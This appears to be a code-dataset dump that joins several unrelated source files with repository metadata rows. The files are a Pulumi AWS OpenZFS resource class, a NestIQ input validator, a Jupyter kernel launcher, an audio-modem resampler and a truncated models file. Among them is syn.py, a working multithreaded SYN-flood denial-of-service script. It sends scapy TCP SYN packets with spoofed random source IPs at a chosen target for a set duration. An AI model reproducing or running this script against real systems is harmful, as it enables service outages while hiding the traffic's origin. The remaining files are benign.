security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
storage_capacity: Optional[pulumi.Input[int]] = None,
storage_type: Optional[pulumi.Input[str]] = None,
subnet_ids: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
throughput_capacity: Optional[pulumi.Input[int]] = None,
vpc_id: Optional[pulumi.Input[str]] = None,
weekly_maintenance_start_time: Optional[pulumi.Input[str]] = None) -> 'OpenZfsFileSystem':
"""
Get an existing OpenZfsFileSystem resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: Amazon Resource Name of the file system.
:param pulumi.Input[int] automatic_backup_retention_days: The number of days to retain automatic backups. Setting this to 0 disables automatic backups. You can retain automatic backups for a maximum of 90 days.
:param pulumi.Input[str] backup_id: The ID of the source backup to create the filesystem from.
:param pulumi.Input[bool] copy_tags_to_backups: A boolean flag indicating whether tags for the file system should be copied to backups. The default value is false.
:param pulumi.Input[bool] copy_tags_to_volumes: A boolean flag indicating whether tags for the file system should be copied to snapshots. The default value is false.
:param pulumi.Input[str] daily_automatic_backup_start_time: A recurring daily time, in the format HH:MM. HH is the zero-padded hour of the day (0-23), and MM is the zero-padded minute of the hour. For example, 05:00 specifies 5 AM daily. Requires `automatic_backup_retention_days` to be set.
:param pulumi.Input[str] deployment_type: - The filesystem deployment type. Only `SINGLE_AZ_1` is supported.
:param pulumi.Input[pulumi.InputType['OpenZfsFileSystemDiskIopsConfigurationArgs']] disk_iops_configuration: The SSD IOPS configuration for the Amazon FSx for OpenZFS file system. See Disk Iops Configuration Below.
:param pulumi.Input[str] dns_name: DNS name for the file system, e.g., `fs-12345678.fsx.us-west-2.amazonaws.com`
:param pulumi.Input[str] kms_key_id: ARN for the KMS Key to encrypt the file system at rest, Defaults to an AWS managed KMS Key.
:param pulumi.Input[Sequence[pulumi.Input[str]]] network_interface_ids: Set of Elastic Network Interface identifiers from which the file system is accessible The first network interface returned is the primary network interface.
:param pulumi.Input[str] owner_id: AWS account identifier that created the file system.
:param pulumi.Input[pulumi.InputType['OpenZfsFileSystemRootVolumeConfigurationArgs']] root_volume_configuration: The configuration for the root volume of the file system. All other volumes are children or the root volume. See Root Volume Configuration Below.
:param pulumi.Input[str] root_volume_id: Identifier of the root volume, e.g., `fsvol-12345678`
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A list of IDs for the security groups that apply to the specified network interfaces created for file system access. These security groups will apply to all network interfaces.
:param pulumi.Input[int] storage_capacity: The storage capacity (GiB) of the file system. Valid values between `64` and `524288`.
:param pulumi.Input[str] storage_type: The filesystem storage type. Only `SSD` is supported.
:param pulumi.Input[str] subnet_ids: A list of IDs for the subnets that the file system will be accessible from. Exactly 1 subnet need to be provided.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the file system. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
:param pulumi.Input[int] throughput_capacity: Throughput (megabytes per second) of the file system in power of 2 increments. Minimum of `64` and maximum of `4096`.
:param pulumi.Input[str] vpc_id: Identifier of the Virtual Private Cloud for the file system.
:param pulumi.Input[str] weekly_maintenance_start_time: The preferred start time (in `d:HH:MM` format) to perform weekly maintenance, in the UTC time zone.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _OpenZfsFileSystemState.__new__(_OpenZfsFileSystemState)
__props__.__dict__["arn"] = arn
__props__.__dict__["automatic_backup_retention_days"] = automatic_backup_retention_days
__props__.__dict__["backup_id"] = backup_id
__props__.__dict__["copy_tags_to_backups"] = copy_tags_to_backups
__props__.__dict__["copy_tags_to_volumes"] = copy_tags_to_volumes
__props__.__dict__["daily_automatic_backup_start_time"] = daily_automatic_backup_start_time
__props__.__dict__["deployment_type"] = deployment_type
__props__.__dict__["disk_iops_configuration"] = disk_iops_configuration
__props__.__dict__["dns_name"] = dns_name
__props__.__dict__["kms_key_id"] = kms_key_id
__props__.__dict__["network_interface_ids"] = network_interface_ids
__props__.__dict__["owner_id"] = owner_id
__props__.__dict__["root_volume_configuration"] = root_volume_configuration
__props__.__dict__["root_volume_id"] = root_volume_id
__props__.__dict__["security_group_ids"] = security_group_ids
__props__.__dict__["storage_capacity"] = storage_capacity
__props__.__dict__["storage_type"] = storage_type
__props__.__dict__["subnet_ids"] = subnet_ids
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
__props__.__dict__["throughput_capacity"] = throughput_capacity
__props__.__dict__["vpc_id"] = vpc_id
__props__.__dict__["weekly_maintenance_start_time"] = weekly_maintenance_start_time
return OpenZfsFileSystem(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
Amazon Resource Name of the file system.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="automaticBackupRetentionDays")
def automatic_backup_retention_days(self) -> pulumi.Output[Optional[int]]:
"""
The number of days to retain automatic backups. Setting this to 0 disables automatic backups. You can retain automatic backups for a maximum of 90 days.
"""
return pulumi.get(self, "automatic_backup_retention_days")
@property
@pulumi.getter(name="backupId")
def backup_id(self) -> pulumi.Output[Optional[str]]:
"""
The ID of the source backup to create the filesystem from.
"""
return pulumi.get(self, "backup_id")
@property
@pulumi.getter(name="copyTagsToBackups")
def copy_tags_to_backups(self) -> pulumi.Output[Optional[bool]]:
"""
A boolean flag indicating whether tags for the file system should be copied to backups. The default value is false.
"""
return pulumi.get(self, "copy_tags_to_backups")
@property
@pulumi.getter(name="copyTagsToVolumes")
def copy_tags_to_volumes(self) -> pulumi.Output[Optional[bool]]:
"""
A boolean flag indicating whether tags for the file system should be copied to snapshots. The default value is false.
"""
return pulumi.get(self, "copy_tags_to_volumes")
@property
@pulumi.getter(name="dailyAutomaticBackupStartTime")
def daily_automatic_backup_start_time(self) -> pulumi.Output[str]:
"""
A recurring daily time, in the format HH:MM. HH is the zero-padded hour of the day (0-23), and MM is the zero-padded minute of the hour. For example, 05:00 specifies 5 AM daily. Requires `automatic_backup_retention_days` to be set.
"""
return pulumi.get(self, "daily_automatic_backup_start_time")
@property
@pulumi.getter(name="deploymentType")
def deployment_type(self) -> pulumi.Output[str]:
"""
- The filesystem deployment type. Only `SINGLE_AZ_1` is supported.
"""
return pulumi.get(self, "deployment_type")
@property
@pulumi.getter(name="diskIopsConfiguration")
def disk_iops_configuration(self) -> pulumi.Output['outputs.OpenZfsFileSystemDiskIopsConfiguration']:
"""
The SSD IOPS configuration for the Amazon FSx for OpenZFS file system. See Disk Iops Configuration Below.
"""
return pulumi.get(self, "disk_iops_configuration")
@property
@pulumi.getter(name="dnsName")
def dns_name(self) -> pulumi.Output[str]:
"""
DNS name for the file system, e.g., `fs-12345678.fsx.us-west-2.amazonaws.com`
"""
return pulumi.get(self, "dns_name")
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> pulumi.Output[str]:
"""
ARN for the KMS Key to encrypt the file system at rest, Defaults to an AWS managed KMS Key.
"""
return pulumi.get(self, "kms_key_id")
@property
@pulumi.getter(name="networkInterfaceIds")
def network_interface_ids(self) -> pulumi.Output[Sequence[str]]:
"""
Set of Elastic Network Interface identifiers from which the file system is accessible The first network interface returned is the primary network interface.
"""
return pulumi.get(self, "network_interface_ids")
@property
@pulumi.getter(name="ownerId")
def owner_id(self) -> pulumi.Output[str]:
"""
AWS account identifier that created the file system.
"""
return pulumi.get(self, "owner_id")
@property
@pulumi.getter(name="rootVolumeConfiguration")
def root_volume_configuration(self) -> pulumi.Output['outputs.OpenZfsFileSystemRootVolumeConfiguration']:
"""
The configuration for the root volume of the file system. All other volumes are children or the root volume. See Root Volume Configuration Below.
"""
return pulumi.get(self, "root_volume_configuration")
@property
@pulumi.getter(name="rootVolumeId")
def root_volume_id(self) -> pulumi.Output[str]:
"""
Identifier of the root volume, e.g., `fsvol-12345678`
"""
return pulumi.get(self, "root_volume_id")
@property
@pulumi.getter(name="securityGroupIds")
def security_group_ids(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of IDs for the security groups that apply to the specified network interfaces created for file system access. These security groups will apply to all network interfaces.
"""
return pulumi.get(self, "security_group_ids")
@property
@pulumi.getter(name="storageCapacity")
def storage_capacity(self) -> pulumi.Output[Optional[int]]:
"""
The storage capacity (GiB) of the file system. Valid values between `64` and `524288`.
"""
return pulumi.get(self, "storage_capacity")
@property
@pulumi.getter(name="storageType")
def storage_type(self) -> pulumi.Output[Optional[str]]:
"""
The filesystem storage type. Only `SSD` is supported.
"""
return pulumi.get(self, "storage_type")
@property
@pulumi.getter(name="subnetIds")
def subnet_ids(self) -> pulumi.Output[str]:
"""
A list of IDs for the subnets that the file system will be accessible from. Exactly 1 subnet need to be provided.
"""
return pulumi.get(self, "subnet_ids")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A map of tags to assign to the file system. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> pulumi.Output[Mapping[str, str]]:
"""
A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
"""
return pulumi.get(self, "tags_all")
@property
@pulumi.getter(name="throughputCapacity")
def throughput_capacity(self) -> pulumi.Output[int]:
"""
Throughput (megabytes per second) of the file system in power of 2 increments. Minimum of `64` and maximum of `4096`.
"""
return pulumi.get(self, "throughput_capacity")
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> pulumi.Output[str]:
"""
Identifier of the Virtual Private Cloud for the file system.
"""
return pulumi.get(self, "vpc_id")
@property
@pulumi.getter(name="weeklyMaintenanceStartTime")
def weekly_maintenance_start_time(self) -> pulumi.Output[str]:
"""
The preferred start time (in `d:HH:MM` format) to perform weekly maintenance, in the UTC time zone.
"""
return pulumi.get(self, "weekly_maintenance_start_time")
| 56.30131
| 550
| 0.694982
| 63,983
| 0.992523
| 0
| 0
| 59,088
| 0.91659
| 0
| 0
| 33,779
| 0.52399
|
8bc5033e6745dd8bddb7a355569fc61f7cd99932
| 1,410
|
py
|
Python
|
tools/other/syn.py
|
fengjixuchui/geospy
|
12ff83372a7e128babd8f16c357672d1495022c8
|
[
"MIT"
] | 1
|
2019-11-12T05:53:25.000Z
|
2019-11-12T05:53:25.000Z
|
tools/other/syn.py
|
fengjixuchui/geospy
|
12ff83372a7e128babd8f16c357672d1495022c8
|
[
"MIT"
] | null | null | null |
tools/other/syn.py
|
fengjixuchui/geospy
|
12ff83372a7e128babd8f16c357672d1495022c8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import random
import time
from scapy.all import IP, TCP, send
from threading import Thread
# Import modules for SYN flood
import tools.randomData as randomData
def SYN_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
target_ip = target.split(":")[0]
target_port = int(target.split(":")[1])
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting SYN attack...")
threads_list = []
# SYN flood
def syn_flood():
global FINISH
while True:
if FINISH:
break
IP_Packet = IP()
IP_Packet.src = randomData.random_IP()
IP_Packet.dst = target_ip
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target_port
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
try:
send(IP_Packet / TCP_Packet, verbose = False)
except Exception as e:
print(e)
else:
print("\033[1;32m"+"[+]"+"\033[0m"+" SYN packet was sent!")
# Start threads
for thread in range(0, threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread) + "...")
t = Thread(target = syn_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;77m"+"[i]"+"\033[0m"+" Attack completed.")
| 23.114754
| 78
| 0.668085
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 334
| 0.236879
|
8bc5c14508eaa101207214cbf9fa6cdfc7a9bf62
| 19,405
|
py
|
Python
|
NIQ_uncompiled/source_code/check_valid.py
|
wxhawkins/NestIQ
|
3a004d330e2c68b0c7eb0b0676bc4d044e52cbe4
|
[
"Apache-2.0"
] | null | null | null |
NIQ_uncompiled/source_code/check_valid.py
|
wxhawkins/NestIQ
|
3a004d330e2c68b0c7eb0b0676bc4d044e52cbe4
|
[
"Apache-2.0"
] | null | null | null |
NIQ_uncompiled/source_code/check_valid.py
|
wxhawkins/NestIQ
|
3a004d330e2c68b0c7eb0b0676bc4d044e52cbe4
|
[
"Apache-2.0"
] | null | null | null |
import time
import datetime as dt
from pathlib import Path
from tkinter import messagebox
import re
import niq_misc
import math
import traceback
from niq_misc import replace_entry
def check_valid_vertex_file(gui):
"""
Checks user-provided vertex selection file (HTML) for issues that could cause errors with
downstream processes.
Returns:
True if file passes all tests, else displays error message and returns False
"""
niq_misc.remove_curly(gui.vertex_file_E)
vertex_path = Path(gui.vertex_file_E.get())
# Check if path is empty
if vertex_path.name == "":
messagebox.showerror("Vertex File Error", "Please provide a vertex file.")
return False
# Check if path has invalid path
if vertex_path.suffix not in (".html", ""):
messagebox.showerror("Vertex Selection Error", r'Vertex selection file must have ".html" extension.')
return False
# Check if path exists
if not vertex_path.exists():
messagebox.showerror("Vertex Selection Error", "Provided vertex selection file not found.")
return False
with open(vertex_path, "r") as original_file:
original_lines = original_file.readlines()
# Remove extra table data lines if present
cleaned_content = str()
found = False
for line in original_lines:
if "<div class" in line:
found = True
if found:
cleaned_content += line
# Get datapoints
tokens = re.finditer(r">([\d\.-]+)</span>", cleaned_content)
token_num = 0
try:
# Every other value in tokens will be temperature and so is ignored
for counter, match in enumerate(tokens):
token_num = counter
if not (counter % 2) == 0:
round(float(match.group(1)))
except:
messagebox.showerror(("Vertex File Error"), "Vertex file is unreadable. Please try another.")
return False
if token_num < 2:
messagebox.showerror(
"Vertex File Error",
"No vertices detected in vertex file.\n\n" +
'When saving plots, ensure the file type option is set to \"Webpage, Complete\" not \"Webpage, HTML only\".'
)
return False
return True
def check_valid_main(gui, first_in=True, check_output=True):
"""
Checks for valid configuration of all parameters housed on the Main tab. This includes extensive
review of the input file provided.
Args:
first_in (bool): False if current file is second or later in a queue of multiple input files
check_output (bool): if False, output file names are not examined
"""
def check_input_file(gui):
"""
Checks several aspects of the input file to ensure it is compatable with all downstream processing.
Also displays warnings for less severe format violations.
"""
def check_datetime_intervals():
""" Sets time interval between temperature readings and checks for gaps in date/time column. """
delta_secs = (datetimes[-1] - datetimes[0]).total_seconds()
interval = dt.timedelta(seconds=round(delta_secs / len(master_list)))
if not gui.show_warns_BV.get():
return True
# If interval is greater than or equal to one minute
if interval.seconds >= 60:
i = 1
while i < len(datetimes):
if datetimes[i - 1] + interval != datetimes[i]:
messagebox.showwarning(
"Date/time Warning",
f"{file_name_appendage}Discontinuous date/time found for data point {master_list[i][0]}." +
"The run will continue, but this could cause inaccurate statistical output.",
)
i += 1
return True
# If interval is less than one minute
# Identify first change in date/time
i = 0
while datetimes[i] == datetimes[0]:
i += 1
# Find least common denominator with one minute
LCD = abs(interval.seconds*60) // math.gcd(interval.seconds, 60)
dp_leap = int(LCD / interval.seconds) # There should be a whole number minute change after this many data points
min_leap = dt.timedelta(minutes=int(LCD / 60)) # That whole number of minutes is this
i += dp_leap
while i < len(datetimes):
if datetimes[i - dp_leap] + min_leap != datetimes[i]:
messagebox.showwarning(
"Date/time Warning",
f"{file_name_appendage}Discontinuous date/time found for data point {master_list[i][0]}." +
"The run will continue, but this could cause inaccurate statistical output.",
)
i += dp_leap
return True
in_file_path = gui.active_input_path
file_name_appendage = f"For file: {in_file_path.name} \n\n"
datetimes = []
if in_file_path.name == "":
messagebox.showerror("Input error (Main tab)", "No input file provided.")
return False
if not in_file_path.exists():
messagebox.showerror("Input File Error", "".join((file_name_appendage, "File with provided path could not be found.")))
return False
if in_file_path.suffix not in (".csv", ".html"):
messagebox.showerror("Input File Error", f'{file_name_appendage} Input file must have "csv" or "html" extension.')
return False
try:
# In the case of an HTML input, simply check for the presence of input file data
if in_file_path.suffix == ".html":
with open(in_file_path, "r") as f:
content = f.read()
if "NestIQ input data" in content:
return True
else:
messagebox.showerror("Input File Error", f'{file_name_appendage} HTML file does not contain the necessary information for processing.')
return False
with open(in_file_path, "r") as f:
lines = f.readlines()
master_list = [line.strip().rstrip(",").split(",") for line in lines]
pop_indices = []
# Remove lines not conforming to expected format (such as headers)
for i in range(len(master_list[:-1])):
# Cells in data point column must contain only numbers
if not str(master_list[i][0]).isnumeric():
pop_indices.append(i)
for pop_count, index in enumerate(pop_indices):
master_list.pop(index - pop_count)
master_list.pop(len(master_list) - 1)
prev_line = master_list[0]
if len(prev_line) < 3:
gui.air_valid = False
for line in master_list[1:]:
line = line[:4] if gui.air_valid else line[:3]
# Check if data points are continuous and sequential
try:
if not int(line[0]) == (int(prev_line[0]) + 1):
raise ValueError
except:
messagebox.showerror(
"Data Point Error",
f"{file_name_appendage}Error after data point "
+ f"{prev_line[0]}. Data point number is not sequential with regard to previous data point.",
)
return False
# Test conversion of date/time string to datetime object
try:
datetimes.append(niq_misc.convert_to_datetime(line[1]))
except ValueError:
messagebox.showerror(
"Date/Time Error", f"{file_name_appendage}Invalid date/time found for data point {line[0]}. Date/Time should be in MM/DD/YYYY HH:MM (:SS) format."
)
return False
# Check egg temperatures column
try:
float(line[2])
except:
messagebox.showerror("Temperature Error", f"{file_name_appendage}Invalid temperature given for data point {line[0]}.")
return False
# Check air temperatures column if appropriate
if gui.air_valid:
try:
float(line[3])
except (IndexError, ValueError):
gui.air_valid = False
if gui.show_warns_BV.get():
messagebox.showwarning(
"Air Temperature Warning",
f"{file_name_appendage}Invalid air temperature detected for data point "
+ f"{line[0]}. Air temperatures will not be plotted or included in statistical output.",
)
prev_line = line
# Lastly, check if date/times are continuous
return check_datetime_intervals()
except Exception as e:
print(e)
traceback.print_exc()
messagebox.showerror(
"Unknown Error",
f"{file_name_appendage}There was an unidentifiable error with the provided input file. "
+ "This is sometimes the result of 'extra' cells in the input file.\n\n"
+ "Please reference the NestIQ manual for details regarding proper input file format."
+ " This can be accessed by clicking 'Help' in the top right.",
)
return False
def check_out_file(gui, entry, title):
"""
Checks if the name provided for a given output file is valid. This includes asking the user if
they want to override if a file with the same name already exists.
Args:
entry (tk.Entry): entry box being examined
title (string): how to reference the current entry box if error messeage is triggered
"""
if entry.get() == "":
messagebox.showerror(f"{title} Error", "File name is empty.")
return False
entry_path = Path(entry.get())
if entry_path.is_dir():
messagebox.showerror(f"{title} Error", "Directory provided but no file name.")
return False
# Add extension if not present
if entry == gui.plot_file_E:
ext = ".html"
elif entry == gui.stats_file_E or entry == gui.multi_in_stats_file_E:
ext = ".csv"
entry_path = Path(entry.get()).with_suffix(ext)
# Default to "output_files" directory if only filename (no dir) provided
if str(entry_path.parent) == ".":
entry_path = gui.master_dir_path / "output_files" / entry_path
replace_entry(entry, str(entry_path))
# Check if plot file already exists and if so, ask to override
if entry_path.exists():
if gui.show_warns_BV.get():
if not messagebox.askyesno("Override?", f"The file '{entry.get()}' already exists. Do you want to override?"):
return False
try:
entry_path.unlink()
except PermissionError:
messagebox.showerror(f"{title} Error", "File could not be overridden. Please ensure files are closed before overriding.")
return False
return True
# Check time entry boxes
for time_str in (gui.day_start_E.get(), gui.night_start_E.get()):
try:
time.strptime(time_str, "%H:%M")
except ValueError:
messagebox.showerror("Daytime Start/End Error", f"Provided value of {time_str} is invalid. Please provide times in 24 hr HH:MM (:SS) format.")
return False
# Check data smoothing box
try:
if not float(gui.smoothing_radius_E.get()).is_integer():
raise ValueError
if int(gui.smoothing_radius_E.get()) < 0:
messagebox.showerror("Data Smoothing Radius Error", "Data smoothing radius must be greater than or equal to zero.")
return False
except ValueError:
messagebox.showerror("Data Smoothing Radius Error", "Data smoothing radius must be an integer.")
return False
# Check duration threshold box
try:
if int(float(gui.dur_thresh_E.get())) < 0:
messagebox.showerror("Duration Threshold Error", "Duration threshold cannot be less than zero.")
return False
except ValueError:
messagebox.showerror("Duration Threshold Error", "Invalid duration threshold (could not convert to integer).")
return False
if not check_input_file(gui):
return False
if check_output:
if gui.make_plot_BV.get():
if not check_out_file(gui, gui.plot_file_E, "Plot File"):
return False
if gui.get_stats_BV.get():
if not check_out_file(gui, gui.stats_file_E, "Stats Output File"):
return False
if gui.multi_in_stats_BV.get() and first_in:
if not check_out_file(gui, gui.multi_in_stats_file_E, "Compile Summary"):
return False
return True
def check_valid_adv(gui):
"""
Checks for valid configuration of all parameters housed on the Advanced tab.
"""
def try_autofill():
"""
Checks if all Markov model parameter boxes are empty and runs unsupervised learning if so.
"""
for entry in (
gui.init_off_E,
gui.init_on_E,
gui.off_off_trans_E,
gui.off_on_trans_E,
gui.on_on_trans_E,
gui.on_off_trans_E,
gui.off_mean_E,
gui.on_mean_E,
gui.off_stdev_E,
gui.on_stdev_E,
):
if entry.get() != "":
return False
gui.unsupervised_learning(auto_run=True)
return True
try:
entries = (gui.init_off_E, gui.init_on_E, gui.off_off_trans_E, gui.off_on_trans_E, gui.on_on_trans_E, gui.on_off_trans_E)
for entry in entries:
if float(entry.get()) < 0:
raise ValueError("Probability less than 0 provided.")
except ValueError:
if try_autofill():
return True
messagebox.showerror("Parameter Error (Advanced tab)", "Probabilities must be real numbers greater than 0.")
return False
try:
(float(mean) for mean in (gui.off_mean_E.get(), gui.on_mean_E.get()))
except TypeError:
messagebox.showerror("Parameter Error (Advanced tab)", "Means must be real numbers.")
return False
try:
for stdev in (gui.off_stdev_E.get(), gui.on_stdev_E.get()):
if float(stdev) <= 0:
raise ValueError("Standard deviation less than 0 provided.")
except:
messagebox.showerror("Parameter Error (Advanced tab)", "Standard deviations must be real numbers greater than 0.")
return False
return True
def check_valid_plot_ops(gui):
"""
Checks for valid configuration of all parameters housed on the Plot Options tab.
"""
# Check plot dimensions
if gui.manual_plot_dims.get():
valid = True
try:
if int(gui.plot_dim_x_E.get()) < 1 or int(gui.plot_dim_y_E.get()) < 1:
valid = False
except:
valid = False
if not valid:
messagebox.showwarning(
"Plot Dimensions Warning",
("Provided plot dimensions are not valid; please provide positive integers. Automatic resolution detection will be used."),
)
gui.manual_plot_dims.set(0)
try:
if float(gui.title_font_size_E.get()) < 0:
raise ValueError("Provided plot title font size is less than 0")
except ValueError:
messagebox.showerror("Plot title Font Size Error (Plot Options tab)", "Invalid plot title font size was provided.")
return False
try:
if float(gui.axis_title_font_size_E.get()) < 0:
raise ValueError("Provided axis title font size is less than 0")
except ValueError:
messagebox.showerror("Axis Title Font Size Error (Plot Options tab)", "Invalid axis title font size was provided.")
return False
try:
if float(gui.axis_label_font_size_E.get()) < 0:
raise ValueError("Provided axis label font size is less than 0")
except ValueError:
messagebox.showerror("Axis Label Font Size Error (Plot Options tab)", "Invalid axis label font size was provided.")
return False
try:
if int(gui.axis_tick_size_E.get()) < 0:
raise ValueError("Provided axis tick size is less than 0")
except ValueError:
messagebox.showerror("Axis Tick Size Error (Plot Options tab)", "Invalid axis tick size was provided.")
return False
try:
if float(gui.legend_font_size_E.get()) < 0:
raise ValueError("Provided legend font size is less than 0")
except ValueError:
messagebox.showerror("Legend Font Size Error (Plot Options tab)", "Invalid legend font size was provided.")
return False
# Check plot element sizes/widths
try:
if float(gui.on_point_size_E.get()) < 0:
raise ValueError("Provided on-bout point size is less than 0")
except ValueError:
messagebox.showerror("Point Size Error (Plot Options tab)", "Invalid on-bout point size was provided.")
return False
try:
if float(gui.bout_line_width_E.get()) < 0:
raise ValueError("Provided bout line width is less than 0")
except ValueError:
messagebox.showerror("Line Width Error (Plot Options tab)", "Invalid bout line width was provided.")
return False
try:
if float(gui.air_line_width_E.get()) < 0:
raise ValueError("Provided air line width is less than 0")
except ValueError:
messagebox.showerror("Line Width Error (Plot Options tab)", "Invalid air temperature line width was provided.")
return False
if gui.show_day_markers_BV.get():
try:
if float(gui.day_marker_width_E.get()) < 0:
raise ValueError("Provided day marker size is less than 0")
except ValueError:
messagebox.showerror("Day Marker Size Error (Plot Options tab)", "Invalid day marker size was provided.")
return False
return True
def check_valid_stat_ops(gui):
"""
Checks for valid configuration of all parameters housed on the Stat Options tab.
"""
try:
float(gui.time_above_temper_E.get())
except:
messagebox.showerror("Custom Temperature Error (Stat Options tab)", 'Invalid "Time above" temperature.')
return False
try:
float(gui.time_below_temper_E.get())
except:
messagebox.showerror("Custom Temperature Error (Stat Options tab)", 'Invalid "Time below" temperature.')
return False
return True
| 38.198819
| 171
| 0.588199
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7,656
| 0.394537
|
8bca7c3ef84914924b0c15217d9b07d51210a502
| 395
|
py
|
Python
|
xrobot_launcher.py
|
martinRenou/xeus-robot-wheel
|
e14034c9e7c15417b9b125d3b03f660606df0b4e
|
[
"BSD-3-Clause"
] | null | null | null |
xrobot_launcher.py
|
martinRenou/xeus-robot-wheel
|
e14034c9e7c15417b9b125d3b03f660606df0b4e
|
[
"BSD-3-Clause"
] | null | null | null |
xrobot_launcher.py
|
martinRenou/xeus-robot-wheel
|
e14034c9e7c15417b9b125d3b03f660606df0b4e
|
[
"BSD-3-Clause"
] | null | null | null |
if __name__ == '__main__':
def _xrobot_get_connection_filename():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-f', help='Jupyter kernel connection filename')
args, unknown = parser.parse_known_args()
return args.f
from xrobot import launch as _xrobot_launch
_xrobot_launch(_xrobot_get_connection_filename() or '')
| 35.909091
| 76
| 0.701266
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 52
| 0.131646
|
8bcfdd9c7b143588acd04d3d0910371718e911e3
| 2,977
|
py
|
Python
|
amodem/sampling.py
|
Matthew-MK/amodem
|
a75dda9ab0f7445589a036357e604703ccb34726
|
[
"MIT"
] | 766
|
2015-01-14T15:48:07.000Z
|
2022-03-30T01:19:48.000Z
|
amodem/sampling.py
|
Matthew-MK/amodem
|
a75dda9ab0f7445589a036357e604703ccb34726
|
[
"MIT"
] | 42
|
2015-01-02T18:50:11.000Z
|
2022-03-11T19:10:35.000Z
|
amodem/sampling.py
|
Matthew-MK/amodem
|
a75dda9ab0f7445589a036357e604703ccb34726
|
[
"MIT"
] | 116
|
2015-01-14T20:43:52.000Z
|
2022-03-24T13:10:30.000Z
|
import itertools
import numpy as np
from . import common
class Interpolator:
def __init__(self, resolution=1024, width=128):
self.width = width
self.resolution = resolution
N = resolution * width
u = np.arange(-N, N, dtype=float)
window = np.cos(0.5 * np.pi * u / N) ** 2.0 # raised cosine
h = np.sinc(u / resolution) * window
self.filt = []
for index in range(resolution): # split into multiphase filters
filt = h[index::resolution]
filt = filt[::-1] # flip (due to convolution)
self.filt.append(filt)
lengths = [len(f) for f in self.filt]
self.coeff_len = 2 * width
assert set(lengths) == set([self.coeff_len]) # verify same lengths
assert len(self.filt) == resolution
defaultInterpolator = Interpolator()
class Sampler:
def __init__(self, src, interp=None, freq=1.0):
self.freq = freq
self.equalizer = lambda x: x # LTI equalization filter
if interp is not None:
self.interp = interp
self.resolution = self.interp.resolution
self.filt = self.interp.filt
self.width = self.interp.width
# polyphase filters are centered at (width + 1) index
padding = [0.0] * self.interp.width
# pad with zeroes to "simulate" regular sampling
self.src = itertools.chain(padding, src)
self.offset = self.interp.width + 1
# samples' buffer to be used by interpolation
self.buff = np.zeros(self.interp.coeff_len)
self.index = 0
self.take = self._take
else:
# skip interpolation (for testing)
src = iter(src)
self.take = lambda size: common.take(src, size)
def _take(self, size):
frame = np.zeros(size)
count = 0
for frame_index in range(size):
offset = self.offset
# offset = k + (j / self.resolution)
k = int(offset) # integer part
j = int((offset - k) * self.resolution) # fractional part
coeffs = self.filt[j] # choose correct filter phase
end = k + self.width
# process input until all buffer is full with samples
try:
while self.index < end:
self.buff[:-1] = self.buff[1:]
self.buff[-1] = next(self.src) # throws StopIteration
self.index += 1
except StopIteration:
break
self.offset += self.freq
# apply interpolation filter
frame[frame_index] = np.dot(coeffs, self.buff)
count = frame_index + 1
return self.equalizer(frame[:count])
def resample(src, dst, df=0.0):
x = common.load(src)
sampler = Sampler(x, Interpolator())
sampler.freq += df
y = sampler.take(len(x))
dst.write(common.dumps(y))
| 32.010753
| 75
| 0.555929
| 2,690
| 0.903594
| 0
| 0
| 0
| 0
| 0
| 0
| 498
| 0.167282
|
8bcfe7bd84165cc2d8ec0ab76054e252d5ad9337
| 2,913
|
py
|
Python
|
rando/core/models.py
|
camillemonchicourt/Geotrek-rando
|
df92c0f19ca37ea1750d934cedafcdb23325bc95
|
[
"BSD-2-Clause"
] | null | null | null |
rando/core/models.py
|
camillemonchicourt/Geotrek-rando
|
df92c0f19ca37ea1750d934cedafcdb23325bc95
|
[
"BSD-2-Clause"
] | null | null | null |
rando/core/models.py
|
camillemonchicourt/Geotrek-rando
|
df92c0f19ca37ea1750d934cedafcdb23325bc95
|
[
"BSD-2-Clause"
] | null | null | null |
import os
